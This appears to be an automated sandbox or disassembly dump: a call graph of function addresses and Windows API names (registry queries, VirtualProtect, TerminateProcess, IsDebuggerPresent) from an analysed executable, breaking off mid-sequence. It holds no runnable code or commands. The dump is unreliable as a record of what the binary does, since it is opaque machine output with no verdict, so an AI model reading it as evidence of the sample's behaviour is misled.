df5eb3 99225 df8ff6 9 API calls __cftof_l 99216->99225 99226 df5b00 67 API calls 5 library calls 99217->99226 99220 df5ed4 99227 df5ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99220->99227 99222 df5ee6 99223 df5ebe __tzset_nolock 99222->99223 99223->98945 99224->99216 99225->99223 99226->99220 99227->99222 99229 dd79ba 99228->99229 99230 dd7a17 99228->99230 99229->99230 99231 dd79c5 99229->99231 99232 dd7e8c 59 API calls 99230->99232 99233 e0ef32 99231->99233 99234 dd79e0 99231->99234 99238 dd79e8 _memmove 99232->99238 99251 dd8189 99233->99251 99250 dd8087 59 API calls Mailbox 99234->99250 99237 e0ef3c 99239 df0ff6 Mailbox 59 API calls 99237->99239 99238->98730 99240 e0ef5c 99239->99240 99242 dd7e9a 99241->99242 99244 dd7ea3 _memmove 99241->99244 99243 dd7faf 59 API calls 99242->99243 99242->99244 99243->99244 99244->98723 99246 dd7ef9 99245->99246 99247 dd7f06 99245->99247 99246->98725 99248 df0ff6 Mailbox 59 API calls 99247->99248 99248->99246 99249->98752 99250->99238 99252 df0ff6 Mailbox 59 API calls 99251->99252 99253 dd8193 99252->99253 99253->99237 99255 dd7bbf 99254->99255 99259 dd7be5 _memmove 99254->99259 99256 df0ff6 Mailbox 59 API calls 99255->99256 99255->99259 99257 dd7c34 99256->99257 99258 df0ff6 Mailbox 59 API calls 99257->99258 99258->99259 99259->98765 99260->98766 99261->98808 99262->98810 99263->98860 99265 df4a9f __tzset_nolock 99264->99265 99266 df4abd 99265->99266 99267 df4ad5 99265->99267 99269 df4acd __tzset_nolock 99265->99269 99344 df8d68 58 API calls __getptd_noexit 99266->99344 99270 df6e4e __lock_file 59 API calls 99267->99270 99269->98872 99272 df4adb 99270->99272 99271 df4ac2 99345 df8ff6 9 API calls __cftof_l 99271->99345 99332 df493a 99272->99332 99278 df55e2 __tzset_nolock 99277->99278 99279 df560e 99278->99279 99280 df55f6 99278->99280 99282 df6e4e __lock_file 59 API calls 99279->99282 99287 df5606 __tzset_nolock 99279->99287 99514 df8d68 58 API calls __getptd_noexit 99280->99514 99284 df5620 99282->99284 99283 df55fb 99515 df8ff6 9 API calls __cftof_l 99283->99515 99498 df556a 99284->99498 99287->98864 99291 e39b52 SetFileTime CloseHandle 99290->99291 99292 e39b68 99290->99292 99291->99292 99292->98840 99296 e399d2 __tzset_nolock _wcscmp 99293->99296 99294 dd506b 74 API calls 99294->99296 99295 e39393 GetSystemTimeAsFileTime 99295->99296 99296->99294 99296->99295 99297 e3949a 99296->99297 99298 dd5045 85 API calls 99296->99298 99297->98840 99299 df432e 58 API calls __wsplitpath_helper 99297->99299 99298->99296 99299->98843 99300->98851 99302 e38d9b 99301->99302 99303 e38da9 99301->99303 99304 df548b 115 API calls 99302->99304 99305 e38dee 99303->99305 99306 df548b 115 API calls 99303->99306 99317 e38db2 99303->99317 99304->99303 99587 e3901b 99305->99587 99308 e38dd3 99306->99308 99308->99305 99310 e38ddc 99308->99310 99310->99317 99317->98869 99317->98877 99335 df4949 99332->99335 99339 df4967 99332->99339 99333 df4957 99375 df8d68 58 API calls __getptd_noexit 99333->99375 99335->99333 99335->99339 99342 df4981 _memmove 99335->99342 99336 df495c 99376 df8ff6 9 API calls __cftof_l 99336->99376 99346 df4b0d RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99339->99346 99341 df4916 __flswbuf 58 API calls 99341->99342 99342->99339 99342->99341 99347 dfdac6 99342->99347 99377 df4c6d 99342->99377 99383 dfb05e 78 API calls 5 library calls 99342->99383 99344->99271 99345->99269 99346->99269 99348 dfdad2 __tzset_nolock 99347->99348 99349 dfdadf 99348->99349 99350 dfdaf6 99348->99350 99457 df8d34 58 API calls __getptd_noexit 99349->99457 99352 dfdb95 99350->99352 99353 dfdb0a 99350->99353 99463 df8d34 58 API calls __getptd_noexit 99352->99463 99356 dfdb28 99353->99356 99357 dfdb32 99353->99357 99355 dfdae4 99375->99336 99376->99339 99378 df4ca4 99377->99378 99379 df4c80 99377->99379 99378->99342 99379->99378 99380 df4916 __flswbuf 58 API calls 99379->99380 99381 df4c9d 99380->99381 99382 dfdac6 __write 78 API calls 99381->99382 99382->99378 99383->99342 99457->99355 99499 df558d 99498->99499 99500 df5579 99498->99500 99502 df4c6d __flush 78 API calls 99499->99502 99512 df5589 99499->99512 99547 df8d68 58 API calls __getptd_noexit 99500->99547 99504 df5599 99502->99504 99503 df557e 99548 df8ff6 9 API calls __cftof_l 99503->99548 99517 e00dc7 99504->99517 99508 df4916 __flswbuf 58 API calls 99516 df5645 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99512->99516 99514->99283 99515->99287 99516->99287 99518 df55a1 99517->99518 99519 e00dd4 99517->99519 99518->99508 99519->99518 99520 df2f95 _free 58 API calls 99519->99520 99520->99518 99547->99503 99548->99512 99588 e39040 99587->99588 99589 e39029 __tzset_nolock _memmove 99587->99589 99630 dd7dbf __wsetenvp 99629->99630 99631 dd8189 59 API calls 99630->99631 99632 dd7dd0 _memmove 99630->99632 99633 e0f130 _memmove 99631->99633 99632->98884 99634->98896 99661 dd7b76 99635->99661 99637 dd65ca 99668 dd766f 99637->99668 99639 dd65e4 Mailbox 99639->98664 99642 e0e41f 99678 e2fdba 91 API calls 4 library calls 99642->99678 99643 dd7eec 59 API calls 99655 dd63c5 99643->99655 99645 dd766f 59 API calls 99645->99655 99648 e0e42d 99649 dd766f 59 API calls 99648->99649 99650 e0e443 99649->99650 99650->99639 99651 dd68f9 _memmove 99679 e2fdba 91 API calls 4 library calls 99651->99679 99652 e0e3bb 99653 dd8189 59 API calls 99652->99653 99654 e0e3c6 99653->99654 99659 df0ff6 Mailbox 59 API calls 99654->99659 99655->99637 99655->99642 99655->99643 99655->99645 99655->99651 99655->99652 99657 dd7faf 59 API calls 99655->99657 99666 dd60cc 60 API calls 99655->99666 99667 dd5ea1 59 API calls Mailbox 99655->99667 99676 dd5fd2 60 API calls 99655->99676 99677 dd7a84 59 API calls 2 library calls 99655->99677 99658 dd659b CharUpperBuffW 99657->99658 99658->99655 99659->99651 99660->98668 99662 df0ff6 Mailbox 59 API calls 99661->99662 99663 dd7b9b 99662->99663 99664 dd8189 59 API calls 99663->99664 99665 dd7baa 99664->99665 99665->99655 99666->99655 99667->99655 99669 dd770f 99668->99669 99672 dd7682 _memmove 99668->99672 99671 df0ff6 Mailbox 59 API calls 99669->99671 99670 df0ff6 Mailbox 59 API calls 99673 dd7689 99670->99673 99671->99672 99672->99670 99674 df0ff6 Mailbox 59 API calls 99673->99674 99675 dd76b2 99673->99675 99674->99675 99675->99639 99676->99655 99677->99655 99678->99648 99679->99639 99681 e33e7a 99680->99681 99682 e346b1 FindFirstFileW 99680->99682 99681->98433 99682->99681 99683 e346c6 FindClose 99682->99683 99683->99681 99684->98456 99685->98450 99686->98340 99687->98340 99688->98339 99689->98342 99690->98345 99691->98342 99692->98366 99693 dde5ec 99696 ddce1a 99693->99696 99695 dde5f8 99697 ddce86 99696->99697 99698 ddce32 99696->99698 99703 ddceaf 99697->99703 99706 e3a0b5 89 API calls 4 library calls 99697->99706 99698->99697 99699 dda000 331 API calls 99698->99699 99701 ddce69 99699->99701 99701->99703 99705 dd9e9c 60 API calls Mailbox 99701->99705 99702 e129e6 99702->99702 99703->99695 99705->99697 99706->99702 99707 dd1078 99712 dd71eb 99707->99712 99709 dd108c 99710 df2f80 __cinit 67 API calls 99709->99710 99711 dd1096 99710->99711 99713 dd71fb __ftell_nolock 99712->99713 99714 dd77c7 59 API calls 99713->99714 99715 dd72b1 99714->99715 99743 dd4864 99715->99743 99717 dd72ba 99750 df074f 99717->99750 99720 dd7e0b 59 API calls 99721 dd72d3 99720->99721 99756 dd3f84 99721->99756 99724 dd77c7 59 API calls 99725 dd72eb 99724->99725 99726 dd7eec 59 API calls 99725->99726 99727 dd72f4 RegOpenKeyExW 99726->99727 99728 e0ecda RegQueryValueExW 99727->99728 99732 dd7316 Mailbox 99727->99732 99729 e0ecf7 99728->99729 99730 e0ed6c RegCloseKey 99728->99730 99731 df0ff6 Mailbox 59 API calls 99729->99731 99730->99732 99742 e0ed7e _wcscat Mailbox __wsetenvp 99730->99742 99733 e0ed10 99731->99733 99732->99709 99734 dd538e 59 API calls 99733->99734 99735 e0ed1b RegQueryValueExW 99734->99735 99736 e0ed38 99735->99736 99739 e0ed52 99735->99739 99737 dd7d2c 59 API calls 99736->99737 99737->99739 99738 dd7b52 59 API calls 99738->99742 99739->99730 99740 dd7f41 59 API calls 99740->99742 99741 dd3f84 59 API calls 99741->99742 99742->99732 99742->99738 99742->99740 99742->99741 99762 e01b90 99743->99762 99746 dd7f41 59 API calls 99747 dd4897 99746->99747 99764 dd48ae 99747->99764 99749 dd48a1 Mailbox 99749->99717 99751 e01b90 __ftell_nolock 99750->99751 99752 df075c GetFullPathNameW 99751->99752 99753 df077e 99752->99753 99754 dd7d2c 59 API calls 99753->99754 99755 dd72c5 99754->99755 99755->99720 99757 dd3f92 99756->99757 99761 dd3fb4 _memmove 99756->99761 99759 df0ff6 Mailbox 59 API calls 99757->99759 99758 df0ff6 Mailbox 59 API calls 99760 dd3fc8 99758->99760 99759->99761 99760->99724 99761->99758 99763 dd4871 GetModuleFileNameW 99762->99763 99763->99746 99765 e01b90 __ftell_nolock 99764->99765 99766 dd48bb GetFullPathNameW 99765->99766 99767 dd48da 99766->99767 99768 dd48f7 99766->99768 99769 dd7d2c 59 API calls 99767->99769 99770 dd7eec 59 API calls 99768->99770 99771 dd48e6 99769->99771 99770->99771 99774 dd7886 99771->99774 99775 dd7894 99774->99775 99776 dd7e8c 59 API calls 99775->99776 99777 dd48f2 99776->99777 99777->99749 99778 e10226 99779 ddade2 Mailbox 99778->99779 99781 e10c86 99779->99781 99783 e10c8f 99779->99783 99785 e100e0 VariantClear 99779->99785 99786 ddb6c1 99779->99786 99790 e523c9 99779->99790 99828 e4e237 99779->99828 99831 dd9df0 59 API calls Mailbox 99779->99831 99832 e27405 59 API calls 99779->99832 99834 e266f4 59 API calls Mailbox 99781->99834 99785->99779 99833 e3a0b5 89 API calls 4 library calls 99786->99833 99791 dd77c7 59 API calls 99790->99791 99792 e523e0 99791->99792 99793 dd9997 84 API calls 99792->99793 99794 e523ef 99793->99794 99795 dd7b76 59 API calls 99794->99795 99796 e52402 99795->99796 99797 dd9997 84 API calls 99796->99797 99798 e5240f 99797->99798 99799 e5249d 99798->99799 99800 e52429 99798->99800 99801 dd9997 84 API calls 99799->99801 99854 dd9c9c 59 API calls 99800->99854 99803 e524a2 99801->99803 99805 e524b0 99803->99805 99806 e524ce 99803->99806 99804 e5242e 99807 e5248c 99804->99807 99809 e52445 99804->99809 99856 dd9bf8 59 API calls Mailbox 99805->99856 99810 e524e3 99806->99810 99857 dd9c9c 59 API calls 99806->99857 99855 dd9bf8 59 API calls Mailbox 99807->99855 99812 dd79ab 59 API calls 99809->99812 99814 e524f8 99810->99814 99858 dd9c9c 59 API calls 99810->99858 99816 e52452 99812->99816 99815 dd80d7 59 API calls 99814->99815 99818 e52512 99815->99818 99819 dd7c8e 59 API calls 99816->99819 99835 e2f8f2 99818->99835 99821 e52460 99819->99821 99822 dd79ab 59 API calls 99821->99822 99823 e52479 99822->99823 99824 dd7c8e 59 API calls 99823->99824 99827 e52487 99824->99827 99825 e52499 Mailbox 99825->99779 99859 dd9b9c 59 API calls Mailbox 99827->99859 99869 e4cdf1 99828->99869 99830 e4e247 99830->99779 99831->99779 99832->99779 99833->99781 99834->99783 99836 dd77c7 59 API calls 99835->99836 99837 e2f905 99836->99837 99838 dd7b76 59 API calls 99837->99838 99839 e2f919 99838->99839 99846 e2f93b 99839->99846 99860 e2f658 99839->99860 99842 e2f658 61 API calls 99842->99846 99843 e2f9b5 99847 dd79ab 59 API calls 99843->99847 99844 dd79ab 59 API calls 99844->99846 99845 dd79ab 59 API calls 99845->99846 99846->99842 99846->99843 99846->99845 99848 dd7c8e 59 API calls 99846->99848 99849 e2f9ce 99847->99849 99848->99846 99850 dd7c8e 59 API calls 99849->99850 99851 e2f9da 99850->99851 99852 dd80d7 59 API calls 99851->99852 99853 e2f9e9 Mailbox 99851->99853 99852->99853 99853->99827 99854->99804 99855->99825 99856->99825 99857->99810 99858->99814 99859->99825 99861 e2f683 __wsetenvp 99860->99861 99862 e2f6c2 99861->99862 99865 e2f6b8 99861->99865 99866 e2f769 99861->99866 99862->99844 99862->99846 99865->99862 99867 dd7a24 61 API calls 99865->99867 99866->99862 99868 dd7a24 61 API calls 99866->99868 99867->99865 99868->99866 99870 dd9997 84 API calls 99869->99870 99871 e4ce2e 99870->99871 99875 e4ce75 Mailbox 99871->99875 99907 e4dab9 99871->99907 99873 e4d242 99957 e4dbdc 92 API calls Mailbox 99873->99957 99875->99830 99877 e4d251 99880 e4d0db 99877->99880 99881 e4d25d 99877->99881 99878 e4cec6 Mailbox 99878->99875 99879 dd9997 84 API calls 99878->99879 99894 e4d0cd 99878->99894 99939 e3f835 59 API calls 2 library calls 99878->99939 99940 e4d2f3 61 API calls 2 library calls 99878->99940 99879->99878 99920 e4cc82 99880->99920 99881->99875 99886 e4d114 99935 df0e48 99886->99935 99889 e4d147 99942 dd942e 99889->99942 99890 e4d12e 99941 e3a0b5 89 API calls 4 library calls 99890->99941 99893 e4d139 GetCurrentProcess TerminateProcess 99893->99889 99894->99873 99894->99880 99898 e4d2b8 99898->99875 99903 e4d2cc FreeLibrary 99898->99903 99900 e4d17f 99954 e4d95d 107 API calls _free 99900->99954 99903->99875 99906 e4d190 99906->99898 99955 dd8ea0 59 API calls Mailbox 99906->99955 99956 dd9e9c 60 API calls Mailbox 99906->99956 99958 e4d95d 107 API calls _free 99906->99958 99908 dd7faf 59 API calls 99907->99908 99909 e4dad4 CharLowerBuffW 99908->99909 99910 e2f658 61 API calls 99909->99910 99911 e4daf5 99910->99911 99913 dd77c7 59 API calls 99911->99913 99919 e4db30 Mailbox 99911->99919 99914 e4db0d 99913->99914 99915 dd79ab 59 API calls 99914->99915 99916 e4db24 99915->99916 99918 dd7e8c 59 API calls 99916->99918 99917 e4db6c Mailbox 99917->99878 99918->99919 99919->99917 99959 e4d2f3 61 API calls 2 library calls 99919->99959 99921 e4cc9d 99920->99921 99925 e4ccf2 99920->99925 99922 df0ff6 Mailbox 59 API calls 99921->99922 99924 e4ccbf 99922->99924 99923 df0ff6 Mailbox 59 API calls 99923->99924 99924->99923 99924->99925 99926 e4dd64 99925->99926 99927 e4df8d Mailbox 99926->99927 99934 e4dd87 _strcat _wcscpy __wsetenvp 99926->99934 99927->99886 99928 dd9cf8 59 API calls 99928->99934 99929 dd9d46 59 API calls 99929->99934 99930 dd9c9c 59 API calls 99930->99934 99931 dd9997 84 API calls 99931->99934 99932 df594c 58 API calls __crtLCMapStringA_stat 99932->99934 99934->99927 99934->99928 99934->99929 99934->99930 99934->99931 99934->99932 99960 e35b29 61 API calls 2 library calls 99934->99960 99936 df0e5d 99935->99936 99937 df0ef5 VirtualProtect 99936->99937 99938 df0ec3 99936->99938 99937->99938 99938->99889 99938->99890 99939->99878 99940->99878 99941->99893 99943 dd9436 99942->99943 99944 df0ff6 Mailbox 59 API calls 99943->99944 99945 dd9444 99944->99945 99946 dd9450 99945->99946 99961 dd935c 59 API calls Mailbox 99945->99961 99948 dd91b0 99946->99948 99962 dd92c0 99948->99962 99950 dd91bf 99951 df0ff6 Mailbox 59 API calls 99950->99951 99952 dd925b 99950->99952 99951->99952 99952->99906 99953 dd8ea0 59 API calls Mailbox 99952->99953 99953->99900 99954->99906 99955->99906 99956->99906 99957->99877 99958->99906 99959->99917 99960->99934 99961->99946 99963 dd92c9 Mailbox 99962->99963 99964 e0f5c8 99963->99964 99969 dd92d3 99963->99969 99965 df0ff6 Mailbox 59 API calls 99964->99965 99966 e0f5d4 99965->99966 99967 dd92da 99967->99950 99969->99967 99970 dd9df0 59 API calls Mailbox 99969->99970 99970->99969 99971 dd1055 99976 dd2649 99971->99976 99974 df2f80 __cinit 67 API calls 99975 dd1064 99974->99975 99977 dd77c7 59 API calls 99976->99977 99978 dd26b7 99977->99978 99983 dd3582 99978->99983 99981 dd2754 99982 dd105a 99981->99982 99986 dd3416 59 API calls 2 library calls 99981->99986 99982->99974 99987 dd35b0 99983->99987 99986->99981 99988 dd35bd 99987->99988 99989 dd35a1 99987->99989 99988->99989 99990 dd35c4 RegOpenKeyExW 99988->99990 99989->99981 99990->99989 99991 dd35de RegQueryValueExW 99990->99991 99992 dd35ff 99991->99992 99993 dd3614 RegCloseKey 99991->99993 99992->99993 99993->99989 99994 e14599 99998 e2655c 99994->99998 99996 e145a4 99997 e2655c 85 API calls 99996->99997 99997->99996 99999 e26569 99998->99999 100004 e26596 99998->100004 100000 e26598 99999->100000 100001 e2659d 99999->100001 99999->100004 100007 e26590 99999->100007 100010 dd9488 84 API calls Mailbox 100000->100010 100003 dd9997 84 API calls 100001->100003 100005 e265a4 100003->100005 100004->99996 100006 dd7c8e 59 API calls 100005->100006 100006->100004 100009 dd9700 59 API calls _wcsstr 100007->100009 100009->100004 100010->100001 100011 dd1066 100016 ddf8cf 100011->100016 100013 dd106c 100014 df2f80 __cinit 67 API calls 100013->100014 100015 dd1076 100014->100015 100017 ddf8f0 100016->100017 100049 df0143 100017->100049 100021 ddf937 100022 dd77c7 59 API calls 100021->100022 100023 ddf941 100022->100023 100024 dd77c7 59 API calls 100023->100024 100025 ddf94b 100024->100025 100026 dd77c7 59 API calls 100025->100026 100027 ddf955 100026->100027 100028 dd77c7 59 API calls 100027->100028 100029 ddf993 100028->100029 100030 dd77c7 59 API calls 100029->100030 100031 ddfa5e 100030->100031 100059 de60e7 100031->100059 100035 ddfa90 100036 dd77c7 59 API calls 100035->100036 100037 ddfa9a 100036->100037 100087 deffde 100037->100087 100039 ddfae1 100040 ddfaf1 GetStdHandle 100039->100040 100041 ddfb3d 100040->100041 100042 e149d5 100040->100042 100043 ddfb45 OleInitialize 100041->100043 100042->100041 100044 e149de 100042->100044 100043->100013 100094 e36dda 64 API calls Mailbox 100044->100094 100046 e149e5 100095 e374a9 CreateThread 100046->100095 100048 e149f1 CloseHandle 100048->100043 100096 df021c 100049->100096 100052 df021c 59 API calls 100053 df0185 100052->100053 100054 dd77c7 59 API calls 100053->100054 100055 df0191 100054->100055 100056 dd7d2c 59 API calls 100055->100056 100057 ddf8f6 100056->100057 100058 df03a2 6 API calls 100057->100058 100058->100021 100060 dd77c7 59 API calls 100059->100060 100061 de60f7 100060->100061 100062 dd77c7 59 API calls 100061->100062 100063 de60ff 100062->100063 100103 de5bfd 100063->100103 100066 de5bfd 59 API calls 100067 de610f 100066->100067 100068 dd77c7 59 API calls 100067->100068 100069 de611a 100068->100069 100070 df0ff6 Mailbox 59 API calls 100069->100070 100071 ddfa68 100070->100071 100072 de6259 100071->100072 100073 de6267 100072->100073 100074 dd77c7 59 API calls 100073->100074 100075 de6272 100074->100075 100076 dd77c7 59 API calls 100075->100076 100077 de627d 100076->100077 100078 dd77c7 59 API calls 100077->100078 100079 de6288 100078->100079 100080 dd77c7 59 API calls 100079->100080 100081 de6293 100080->100081 100082 de5bfd 59 API calls 100081->100082 100083 de629e 100082->100083 100084 df0ff6 Mailbox 59 API calls 100083->100084 100085 de62a5 RegisterClipboardFormatW 100084->100085 100085->100035 100088 deffee 100087->100088 100089 e25cc3 100087->100089 100090 df0ff6 Mailbox 59 API calls 100088->100090 100106 e39d71 60 API calls 100089->100106 100092 defff6 100090->100092 100092->100039 100093 e25cce 100094->100046 100095->100048 100107 e3748f 65 API calls 100095->100107 100097 dd77c7 59 API calls 100096->100097 100098 df0227 100097->100098 100099 dd77c7 59 API calls 100098->100099 100100 df022f 100099->100100 100101 dd77c7 59 API calls 100100->100101 100102 df017b 100101->100102 100102->100052 100104 dd77c7 59 API calls 100103->100104 100105 de5c05 100104->100105 100105->100066 100106->100093 100108 dd1016 100113 dd4ad2 100108->100113 100111 df2f80 __cinit 67 API calls 100112 dd1025 100111->100112 100114 df0ff6 Mailbox 59 API calls 100113->100114 100115 dd4ada 100114->100115 100116 dd101b 100115->100116 100120 dd4a94 100115->100120 100116->100111 100121 dd4a9d 100120->100121 100122 dd4aaf 100120->100122 100123 df2f80 __cinit 67 API calls 100121->100123 100124 dd4afe 100122->100124 100123->100122 100125 dd77c7 59 API calls 100124->100125 100126 dd4b16 GetVersionExW 100125->100126 100127 dd7d2c 59 API calls 100126->100127 100128 dd4b59 100127->100128 100129 dd7e8c 59 API calls 100128->100129 100138 dd4b86 100128->100138 100130 dd4b7a 100129->100130 100131 dd7886 59 API calls 100130->100131 100131->100138 100132 dd4bf1 GetCurrentProcess IsWow64Process 100133 dd4c0a 100132->100133 100135 dd4c89 GetSystemInfo 100133->100135 100136 dd4c20 100133->100136 100134 e0dc8d 100137 dd4c56 100135->100137 100148 dd4c95 100136->100148 100137->100116 100138->100132 100138->100134 100141 dd4c7d GetSystemInfo 100143 dd4c47 100141->100143 100142 dd4c32 100144 dd4c95 2 API calls 100142->100144 100143->100137 100146 dd4c4d FreeLibrary 100143->100146 100145 dd4c3a GetNativeSystemInfo 100144->100145 100145->100143 100146->100137 100149 dd4c2e 100148->100149 100150 dd4c9e LoadLibraryA 100148->100150 100149->100141 100149->100142 100150->100149 100151 dd4caf GetProcAddress 100150->100151 100151->100149 100152 df7e93 100153 df7e9f __tzset_nolock 100152->100153 100189 dfa048 GetStartupInfoW 100153->100189 100155 df7ea4 100191 df8dbc GetProcessHeap 100155->100191 100157 df7efc 100158 df7f07 100157->100158 100274 df7fe3 58 API calls 3 library calls 100157->100274 100192 df9d26 100158->100192 100161 df7f0d 100162 df7f18 __RTC_Initialize 100161->100162 100275 df7fe3 58 API calls 3 library calls 100161->100275 100213 dfd812 100162->100213 100165 df7f27 100166 df7f33 GetCommandLineW 100165->100166 100276 df7fe3 58 API calls 3 library calls 100165->100276 100232 e05173 GetEnvironmentStringsW 100166->100232 100169 df7f32 100169->100166 100172 df7f4d 100175 df7f58 100172->100175 100277 df32f5 58 API calls 3 library calls 100172->100277 100242 e04fa8 100175->100242 100176 df7f5e 100177 df7f69 100176->100177 100278 df32f5 58 API calls 3 library calls 100176->100278 100256 df332f 100177->100256 100180 df7f71 100181 df7f7c __wwincmdln 100180->100181 100279 df32f5 58 API calls 3 library calls 100180->100279 100262 dd492e 100181->100262 100184 df7f90 100185 df7f9f 100184->100185 100280 df3598 58 API calls _doexit 100184->100280 100281 df3320 58 API calls _doexit 100185->100281 100188 df7fa4 __tzset_nolock 100190 dfa05e 100189->100190 100190->100155 100191->100157 100282 df33c7 36 API calls 2 library calls 100192->100282 100194 df9d2b 100283 df9f7c InitializeCriticalSectionAndSpinCount ___lock_fhandle 100194->100283 100196 df9d30 100197 df9d34 100196->100197 100285 df9fca TlsAlloc 100196->100285 100284 df9d9c 61 API calls 2 library calls 100197->100284 100200 df9d39 100200->100161 100201 df9d46 100201->100197 100202 df9d51 100201->100202 100286 df8a15 100202->100286 100205 df9d93 100294 df9d9c 61 API calls 2 library calls 100205->100294 100208 df9d72 100208->100205 100210 df9d78 100208->100210 100209 df9d98 100209->100161 100293 df9c73 58 API calls 4 library calls 100210->100293 100212 df9d80 GetCurrentThreadId 100212->100161 100214 dfd81e __tzset_nolock 100213->100214 100215 df9e4b __lock 58 API calls 100214->100215 100216 dfd825 100215->100216 100217 df8a15 __calloc_crt 58 API calls 100216->100217 100219 dfd836 100217->100219 100218 dfd8a1 GetStartupInfoW 100226 dfd8b6 100218->100226 100227 dfd9e5 100218->100227 100219->100218 100220 dfd841 __tzset_nolock @_EH4_CallFilterFunc@8 100219->100220 100220->100165 100221 dfdaad 100308 dfdabd RtlLeaveCriticalSection _doexit 100221->100308 100223 df8a15 __calloc_crt 58 API calls 100223->100226 100224 dfda32 GetStdHandle 100224->100227 100225 dfda45 GetFileType 100225->100227 100226->100223 100226->100227 100229 dfd904 100226->100229 100227->100221 100227->100224 100227->100225 100307 dfa06b InitializeCriticalSectionAndSpinCount 100227->100307 100228 dfd938 GetFileType 100228->100229 100229->100227 100229->100228 100306 dfa06b InitializeCriticalSectionAndSpinCount 100229->100306 100233 e05184 100232->100233 100234 df7f43 100232->100234 100309 df8a5d 58 API calls 2 library calls 100233->100309 100238 e04d6b GetModuleFileNameW 100234->100238 100236 e051aa _memmove 100237 e051c0 FreeEnvironmentStringsW 100236->100237 100237->100234 100239 e04d9f _wparse_cmdline 100238->100239 100241 e04ddf _wparse_cmdline 100239->100241 100310 df8a5d 58 API calls 2 library calls 100239->100310 100241->100172 100243 e04fb9 100242->100243 100244 e04fc1 __wsetenvp 100242->100244 100243->100176 100245 df8a15 __calloc_crt 58 API calls 100244->100245 100252 e04fea __wsetenvp 100245->100252 100246 e05041 100247 df2f95 _free 58 API calls 100246->100247 100247->100243 100248 df8a15 __calloc_crt 58 API calls 100248->100252 100249 e05066 100251 df2f95 _free 58 API calls 100249->100251 100251->100243 100252->100243 100252->100246 100252->100248 100252->100249 100253 e0507d 100252->100253 100311 e04857 58 API calls __cftof_l 100252->100311 100312 df9006 IsProcessorFeaturePresent 100253->100312 100255 e05089 100255->100176 100258 df333b __IsNonwritableInCurrentImage 100256->100258 100327 dfa711 100258->100327 100259 df3359 __initterm_e 100260 df2f80 __cinit 67 API calls 100259->100260 100261 df3378 __cinit __IsNonwritableInCurrentImage 100259->100261 100260->100261 100261->100180 100263 dd4948 100262->100263 100273 dd49e7 100262->100273 100264 dd4982 745AC8D0 100263->100264 100330 df35ac 100264->100330 100268 dd49ae 100342 dd4a5b SystemParametersInfoW SystemParametersInfoW 100268->100342 100270 dd49ba 100343 dd3b4c 100270->100343 100272 dd49c2 SystemParametersInfoW 100272->100273 100273->100184 100274->100158 100275->100162 100276->100169 100280->100185 100281->100188 100282->100194 100283->100196 100284->100200 100285->100201 100289 df8a1c 100286->100289 100288 df8a57 100288->100205 100292 dfa026 TlsSetValue 100288->100292 100289->100288 100291 df8a3a 100289->100291 100295 e05446 100289->100295 100291->100288 100291->100289 100303 dfa372 Sleep 100291->100303 100292->100208 100293->100212 100294->100209 100296 e05451 100295->100296 100301 e0546c 100295->100301 100297 e0545d 100296->100297 100296->100301 100304 df8d68 58 API calls __getptd_noexit 100297->100304 100299 e0547c RtlAllocateHeap 100300 e05462 100299->100300 100299->100301 100300->100289 100301->100299 100301->100300 100305 df35e1 RtlDecodePointer 100301->100305 100303->100291 100304->100300 100305->100301 100306->100229 100307->100227 100308->100220 100309->100236 100310->100241 100311->100252 100313 df9011 100312->100313 100318 df8e99 100313->100318 100317 df902c 100317->100255 100319 df8eb3 _memset __call_reportfault 100318->100319 100320 df8ed3 IsDebuggerPresent 100319->100320 100326 dfa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 100320->100326 100322 dfc836 __cftof_l 6 API calls 100324 df8fba 100322->100324 100323 df8f97 __call_reportfault 100323->100322 100325 dfa380 GetCurrentProcess TerminateProcess 100324->100325 100325->100317 100326->100323 100328 dfa714 RtlEncodePointer 100327->100328 100328->100328 100329 dfa72e 100328->100329 100329->100259 100331 df9e4b __lock 58 API calls 100330->100331 100332 df35b7 RtlDecodePointer RtlEncodePointer 100331->100332 100395 df9fb5 RtlLeaveCriticalSection 100332->100395 100334 dd49a7 100335 df3614 100334->100335 100336 df361e 100335->100336 100337 df3638 100335->100337 100336->100337 100396 df8d68 58 API calls __getptd_noexit 100336->100396 100337->100268 100339 df3628 100397 df8ff6 9 API calls __cftof_l 100339->100397 100341 df3633 100341->100268 100342->100270 100344 dd3b59 __ftell_nolock 100343->100344 100345 dd77c7 59 API calls 100344->100345 100346 dd3b63 GetCurrentDirectoryW 100345->100346 100398 dd3778 100346->100398 100348 dd3b8c IsDebuggerPresent 100349 dd3b9a 100348->100349 100350 e0d4ad MessageBoxA 100348->100350 100351 dd3c73 100349->100351 100353 e0d4c7 100349->100353 100354 dd3bb7 100349->100354 100350->100353 100352 dd3c7a SetCurrentDirectoryW 100351->100352 100355 dd3c87 Mailbox 100352->100355 100531 dd7373 59 API calls Mailbox 100353->100531 100479 dd73e5 100354->100479 100355->100272 100359 dd3bd5 GetFullPathNameW 100360 dd7d2c 59 API calls 100359->100360 100362 dd3c10 100360->100362 100361 e0d4d7 100364 e0d4ed SetCurrentDirectoryW 100361->100364 100495 de0a8d 100362->100495 100364->100355 100366 dd3c2e 100395->100334 100396->100339 100397->100341 100399 dd77c7 59 API calls 100398->100399 100400 dd378e 100399->100400 100533 dd3d43 100400->100533 100402 dd37ac 100403 dd4864 61 API calls 100402->100403 100404 dd37c0 100403->100404 100405 dd7f41 59 API calls 100404->100405 100406 dd37cd 100405->100406 100407 dd4f3d 136 API calls 100406->100407 100408 dd37e6 100407->100408 100409 dd37ee Mailbox 100408->100409 100410 e0d3ae 100408->100410 100413 dd81a7 59 API calls 100409->100413 100575 e397e5 100410->100575 100416 dd3801 100413->100416 100414 e0d3cd 100415 df2f95 _free 58 API calls 100414->100415 100418 e0d3da 100415->100418 100547 dd93ea 100416->100547 100417 dd4faa 84 API calls 100417->100414 100420 dd4faa 84 API calls 100418->100420 100422 e0d3e3 100420->100422 100426 dd3ee2 59 API calls 100422->100426 100423 dd7f41 59 API calls 100424 dd381a 100423->100424 100425 dd8620 69 API calls 100424->100425 100427 dd382c Mailbox 100425->100427 100428 e0d3fe 100426->100428 100429 dd7f41 59 API calls 100427->100429 100430 dd3ee2 59 API calls 100428->100430 100431 dd3852 100429->100431 100432 e0d41a 100430->100432 100433 dd8620 69 API calls 100431->100433 100434 dd4864 61 API calls 100432->100434 100436 dd3861 Mailbox 100433->100436 100435 e0d43f 100434->100435 100437 dd3ee2 59 API calls 100435->100437 100439 